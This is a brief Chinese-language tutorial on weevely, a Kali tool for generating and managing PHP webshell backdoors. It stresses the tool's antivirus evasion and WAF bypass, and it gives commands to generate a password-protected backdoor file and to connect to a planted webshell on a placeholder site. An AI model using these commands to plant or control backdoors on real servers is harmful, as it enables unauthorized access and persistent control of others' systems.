Kali上的php后门生成&管理工具–weevely

一、工具简介

weevely是一款Kali下使用python编写的webshell管理工具，可以当作是linux下的一款菜刀的替代工具（仅限于php）。使用weevely生成的木马免杀能力较强，而且使用加密连接，往往能轻松突破WAF拦截。

二、简单使用
终端输入weevely启动，可以看到帮助说明
 

使用说明：

连接一句话木马   weevely <URL> <password> [cmd]
如:weevely http://www.xxx.com/test.php test  test为连接密码

加载session文件  weevely session <path> [cmd]
用来连接曾经连接过的会话

生成后门代理：  weevely generate <password> <path>
如：weevely generate test /root/Desktop/test.php 桌面生成php后门，连接密码为test

另外还可以生成*.img、*.htaccess,但需要服务器开启.htaccess。
友情提醒：该教程仅用于渗透研究，切勿进行非法测试